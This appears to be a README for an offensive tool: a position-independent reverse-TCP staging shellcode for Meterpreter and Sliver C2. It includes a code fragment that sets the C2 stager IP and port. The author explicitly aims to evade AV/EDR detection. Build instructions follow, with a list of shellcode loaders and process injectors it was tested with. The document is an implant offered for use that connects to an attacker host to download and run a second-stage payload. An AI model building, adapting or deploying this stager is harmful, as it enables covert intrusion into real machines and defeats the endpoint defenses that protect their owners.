A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust
#include <Common.h>
#include <Constexpr.h>
#pragma comment(lib, "ws2_32.lib")
LPWSTR* arglist;
// Define IP Adress of your C2 Stager (!)
#define IP_STR "10.10.10.10"
// Define PORT 443 of your TCP Stager
#define PORT 443
...
I wanted to improve my understanding of position independent Shellcode, plus... My Meterpreter reverse_TCP Stager gets caught by a lot of AV/EDRs and I was hoping to somehow get around the IoCs the 15 year old Meterpreter reverse_TCP Shellcode generated by msfvenom. Inspirations were:
- https://github.com/SherifEldeeb/TinyMet
- https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
- not existing HTONS and HTONL functions have been hardcoded
- custom inet_addr function was rewritten and implemented in Main.C
- Socket creation and interaction functions have been imported from ws2_32.dll
- Meterpreter Staging Logic hase been copied from the original project and TinyMet
- Git clone
- change IP and Port in Main.c
- disable the messagebox right before the Stage2 shellcode execution (if it bothers you)
- make
- Use your favourite Shellcode Loader/Injector. I Successfully tested:
- https://github.com/Cipher7/ChaiLdr
- https://github.com/florylsk/ExecIT
- https://github.com/3xpl01tc0d3r/ProcessInjection
- the original Stardust Loader written by Cracked5pider